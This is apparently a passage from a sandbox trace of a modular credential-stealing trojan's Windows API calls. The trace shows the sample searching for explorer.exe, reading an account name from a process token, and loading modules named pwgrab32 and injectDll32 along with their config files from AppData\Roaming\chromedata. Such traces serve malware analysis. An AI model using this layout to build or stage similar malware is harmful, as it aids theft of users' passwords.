	[0227.249] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.250] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.250] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.251] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.251] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.252] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.252] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0227.253] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0227.253] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0227.254] lstrcmpW (lpString1="explorer.exe", lpString2="dllhost.exe") returned 1
	[0227.254] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.255] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.255] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0227.256] CloseHandle (hObject=0x610) returned 1
	[0227.256] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9a8
	[0227.256] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fffc0
	[0227.256] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311420
	[0227.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x610
	[0227.256] OpenProcessToken (in: ProcessHandle=0x610, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x60c) returned 1
	[0227.256] GetTokenInformation (in: TokenHandle=0x60c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0227.256] GetLastError () returned 0x7a
	[0227.256] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6500
	[0227.256] GetTokenInformation (in: TokenHandle=0x60c, TokenInformationClass=0x1, TokenInformation=0x22a6500, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a6500, ReturnLength=0x128c98) returned 1
	[0227.256] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6508*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0227.257] CloseHandle (hObject=0x60c) returned 1
	[0227.257] CloseHandle (hObject=0x610) returned 1
	[0227.257] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777d08
	[0227.257] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff9a8) returned 1
	[0227.257] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778398
	[0227.257] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9a8
	[0227.257] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0227.257] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0227.257] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0227.257] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0227.257] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0227.257] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778398) returned 1
	[0227.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0227.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff9a8) returned 1
	[0227.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fffc0) returned 1
	[0227.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2259f0
	[0227.258] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0227.258] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0227.258] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0227.258] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0227.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2259f0) returned 1
	[0227.258] Sleep (dwMilliseconds=0x4e20) 
	[0227.340] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.340] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0227.340] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610
	[0227.340] GetFileTime (in: hFile=0x610, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0227.340] CloseHandle (hObject=0x610) returned 1
	[0227.340] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.340] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610
	[0227.340] GetFileTime (in: hFile=0x610, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0227.340] CloseHandle (hObject=0x610) returned 1
	[0227.340] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.341] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610
	[0227.341] GetFileTime (in: hFile=0x610, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0227.341] CloseHandle (hObject=0x610) returned 1
	[0227.341] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.341] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0227.341] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610
	[0227.341] GetFileTime (in: hFile=0x610, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0227.341] CloseHandle (hObject=0x610) returned 1
	[0227.341] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.341] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0227.341] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610
	[0227.341] GetFileTime (in: hFile=0x610, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0227.341] CloseHandle (hObject=0x610) returned 1
	[0227.342] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.342] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0227.342] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610
	[0227.342] GetFileTime (in: hFile=0x610, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0227.342] CloseHandle (hObject=0x610) returned 1
	[0227.342] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.342] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0227.342] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0227.342] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b69c0
	[0227.342] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0227.342] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0227.342] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fffc0
	[0227.342] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x234f30
	[0227.342] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0227.342] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0227.342] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22fffc0, Size=0x10) returned 0x22ff9a8
	[0227.342] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22b6298
	[0227.342] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0227.342] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0227.342] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff9a8, Size=0x10) returned 0x22fffc0
	[0227.342] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22caa30
	[0227.342] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0227.342] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0227.343] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22fffc0, Size=0x10) returned 0x22ff9a8
	[0227.343] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2738590
	[0227.343] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0227.343] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0227.343] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff9a8, Size=0x20) returned 0x2778398
	[0227.343] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x271f00
	[0227.343] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 0
	[0227.343] GetLastError () returned 0x12
	[0227.343] FindClose (in: hFindFile=0x22b69c0 | out: hFindFile=0x22b69c0) returned 1
	[0227.343] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0227.343] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0227.343] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x26e438, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0227.343] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610
	[0227.343] GetFileTime (in: hFile=0x610, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0227.343] CloseHandle (hObject=0x610) returned 1
	[0227.343] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.343] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26e438) returned 1
	[0227.343] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0227.343] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0227.343] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x26e438, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0227.343] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610
	[0227.343] GetFileTime (in: hFile=0x610, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0227.344] CloseHandle (hObject=0x610) returned 1
	[0227.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x6f892640, dwHighDateTime=0x1d50a6a)) 
	[0227.344] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26e438) returned 1
	[0227.344] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0227.344] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0227.344] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x26e438, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
